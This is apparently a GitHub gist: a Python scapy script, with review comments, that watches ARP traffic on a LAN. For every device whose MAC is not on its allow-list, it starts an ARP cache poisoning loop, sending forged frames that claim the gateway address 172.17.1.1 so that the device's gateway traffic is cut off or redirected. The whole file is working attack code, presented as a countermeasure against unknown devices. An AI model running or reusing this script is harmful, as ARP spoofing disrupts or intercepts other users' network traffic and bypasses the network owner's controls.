
@firedent
Last active February 19, 2021 16:44
Sniff ARP traffic for clients whose MAC address is not on the whitelist and respond with ARP cache poisoning.
#! /usr/bin/env python
from scapy.all import *
from scapy.layers.l2 import ARP, Ether
import time
import threading
# Notification merge window (seconds): a given MAC is reported on the
# console at most once per window.
notic_inter = 600
# Countermeasure duration (seconds): how long after the last sighting of a
# device the worker keeps sending, and the gap required before a new worker
# is started for the same MAC.
attack_reset = 30
# MAC address -> time.time() of the most recent ARP frame seen from it.
# NOTE(review): entries are never removed anywhere in this script, so the
# table grows with every distinct source MAC observed.
watchlist = {}
# MAC allow-list; frames from these addresses are ignored.
# NOTE(review): a MAC address is asserted by the sender and can be cloned,
# so this list labels devices but does not authenticate them.
whitelist = {
    '84:5d:d7:ff:ff:ff',
    'ac:bc:32:ff:ff:ff',
    'a6:8e:80:ff:ff:ff',
    '18:f6:43:ff:ff:ff',
    '8e:09:d6:ff:ff:ff',
    '0a:42:ef:ff:ff:ff',
}
# Countermeasure worker. ref: https://scapy.readthedocs.io/en/latest/usage.html?highlight=arp#arp-cache-poisoning
def arp_cache_poisoning(clientMAC, clientIP):
    """Keep sending ARP who-has frames to one client while it is still seen.

    Each frame is addressed to ``clientMAC`` at layer 2 and carries
    ``172.17.1.1`` as the ARP sender IP with ``clientIP`` as the target IP.
    The loop ends once the last sighting recorded in ``watchlist`` for
    ``clientMAC`` is ``attack_reset`` seconds old or more.

    NOTE(review): 172.17.1.1 is hard-coded; presumably it is the gateway of
    the monitored segment -- confirm before reuse elsewhere.
    NOTE(review): frames that claim another host's IP are exactly what
    switch-level ARP inspection and ARP-watching monitors are built to flag,
    so expect alerts from such controls while this runs.
    NOTE(review): ``watchlist.get(clientMAC)`` returns None for an unknown
    MAC and the subtraction would then raise TypeError; the only caller in
    this file records the MAC before starting the thread.
    """
    while True:
        # Stop once the device has been absent for a full attack_reset period.
        idle_for = time.time() - watchlist.get(clientMAC)
        if idle_for >= attack_reset:
            break
        frame = Ether(dst=clientMAC) / ARP(op="who-has", psrc='172.17.1.1', pdst=clientIP)
        # inter=1 asks scapy to pause one second between sends; verbose=0
        # silences its per-send output.
        sendp(frame, inter=1, verbose=0)
# Callback handed to sniff(); called once per captured packet.
def arp_monitor_callback(pkt):
    """Record ARP senders that are not allow-listed and react to them.

    For an ARP request or reply whose source MAC is not in ``whitelist``:
    the sighting time is stored in ``watchlist``; a worker thread running
    ``arp_cache_poisoning`` is started when the previous sighting is more
    than ``attack_reset`` seconds old; and a ``HH:MM:SS mac ip`` line is
    returned when the previous sighting is more than ``notic_inter`` seconds
    old. In every other case the function returns None.

    NOTE(review): ``hwsrc`` and ``psrc`` come straight from the captured
    frame, i.e. they are chosen by the sender and are not verified here.
    NOTE(review): there is no cap on worker threads or on ``watchlist``
    size; both scale with the number of distinct source MACs seen, which is
    a resource-exhaustion risk for the monitor itself.
    """
    if ARP not in pkt:
        return None
    arp = pkt[ARP]
    if arp.op not in (1, 2):  # 1 = who-has, 2 = is-at
        return None
    src_mac = arp.hwsrc
    if src_mac in whitelist:
        return None

    now = time.time()
    # A MAC never seen before defaults to 0, so both thresholds are exceeded.
    previous = watchlist.get(src_mac, 0)
    watchlist[src_mac] = now
    gap = now - previous

    # Seen again within one countermeasure period: the existing worker is
    # still looping, so do not start another.
    if gap > attack_reset:
        worker = threading.Thread(
            target=arp_cache_poisoning,
            name=f'attack_{src_mac}',
            args=(src_mac, arp.psrc),
        )
        worker.start()

    # Report a given MAC only once per notification window.
    if gap > notic_inter:
        local_t = time.localtime(time.time())
        return pkt.sprintf(f"{local_t.tm_hour:02}:{local_t.tm_min:02}:{local_t.tm_sec:02} %ARP.hwsrc% %ARP.psrc%")
    return None
# Startup banner, printed once before capture begins.
print("LINK START...")
# ref: https://scapy.readthedocs.io/en/latest/usage.html#simplistic-arp-monitor
# Capture ARP frames only, pass each one to the callback, and do not keep
# captured packets in memory (store=0).
sniff(filter="arp", store=0, prn=arp_monitor_callback)